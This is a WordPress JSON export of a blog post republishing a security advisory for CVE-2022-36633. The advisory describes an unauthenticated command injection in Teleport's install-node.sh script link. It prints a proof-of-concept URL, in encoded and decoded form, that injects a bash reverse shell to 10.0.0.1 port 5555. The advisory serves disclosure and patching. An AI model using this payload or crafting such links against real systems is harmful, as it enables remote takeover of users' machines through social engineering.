{"id":29495,"date":"2022-08-23T18:19:18","date_gmt":"2022-08-23T14:19:18","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168137\/teleport936-exec.txt"},"modified":"2022-08-24T08:21:41","modified_gmt":"2022-08-24T03:51:41","slug":"teleport-9-3-6-command-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/teleport-9-3-6-command-injection\/","title":{"rendered":"Teleport 9.3.6 Command Injection"},"content":{"rendered":"<p dir=\"ltr\">Description: Teleport 9.3.6 is vulnerable to Command injection leading to Remote<br \/>\nCode Execution. An attacker can craft a malicious SSH agent<br \/>\ninstallation link by URL encoding a bash escape with carriage return<br \/>\nline feed. This URL-encoded payload can be used in place of a token and<br \/>\nsent to a user in a social engineering attack. This is a fully<br \/>\nunauthenticated attack utilizing the trusted Teleport server to deliver<br \/>\nthe payload.<\/p>\n<p dir=\"ltr\">Additional Information: https:\/\/goteleport.com\/<br \/>\nhttps:\/\/github.com\/gravitational\/teleport<br \/>\nhttps:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2022-36633<\/p>\n<p dir=\"ltr\">Vulnerability Type: Other (Command injection leading to Remote Code Execution)<\/p>\n<p dir=\"ltr\">Vendor of Product: Teleport &#8211; https:\/\/goteleport.com\/<br \/>\nAffected software version: Teleport version &lt; v10.1.2<\/p>\n<p dir=\"ltr\">Affected Component: https:\/\/teleport.examplesite.com\/scripts\/*INJECTION-POINT*\/install-node.sh?method=iam &lt;https:\/\/teleport.site.com\/scripts\/*INJECTION-POINT*\/install-node.sh?method=iam&gt;<\/p>\n<p dir=\"ltr\">Attack Type: Remote<\/p>\n<p dir=\"ltr\">Impact: Code Execution<br \/>\nImpact Other: This vulnerability allows an attacker to inject code into a bash script without authentication, and craft a legitimate link hosted on the Teleport server to use in social engineering attacks. 
When a user executes the command to install a Teleport SSH agent with the crafted link, it installs the Teleport agent and, without the user's knowledge, executes malicious code in the background.<\/p>\n<p dir=\"ltr\">Attack Vectors: An attacker can craft a malicious SSH agent installation link by URL encoding a bash escape with carriage return line feed. This URL-encoded payload can be used in place of a token and sent to a user in a social engineering attack. This is a fully unauthenticated attack utilizing the trusted Teleport server to deliver the payload.<\/p>\n<p dir=\"ltr\">Example POC payload: https:\/\/teleport.site.com\/scripts\/%22%0a%2f%62%69%6e%2f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%30%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23\/install-node.sh?method=iam &lt;https:\/\/teleport.site.com\/scripts\/%22%0a%2fbin%2fbash%20-l%20%3e%20%2fdev%2ftcp%2f10.0.0.1%2f5555%200%3c%261%202%3e%261%20%23\/install-node.sh?method=iam&gt;<\/p>\n<p dir=\"ltr\">Decoded payload:<br \/>\n&quot;<br \/>\n\/bin\/bash -l &gt; \/dev\/tcp\/10.0.0.1\/5555 0&lt;&amp;1 2&gt;&amp;1 #<\/p>\n<p dir=\"ltr\">Patch information: https:\/\/goteleport.com\/docs\/changelog\/#1012<br \/>\nhttps:\/\/github.com\/gravitational\/teleport\/pull\/14944<br \/>\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/p>\n<p dir=\"ltr\">Discoverers:<br \/>\nBrandon Roach &amp; Brian Landrum<\/p>\n<p dir=\"ltr\">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Description: Teleport 9.3.6 is vulnerable to Command injection leading to Remote Code Execution. An attacker can craft a malicious SSH agent installation link by URL encoding a bash escape with carriage return line feed. This URL-encoded payload can be used in place of a token and sent to a user in a social engineering attack. 
&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-29495","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29495","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=29495"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29495\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=29495"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=29495"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=29495"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}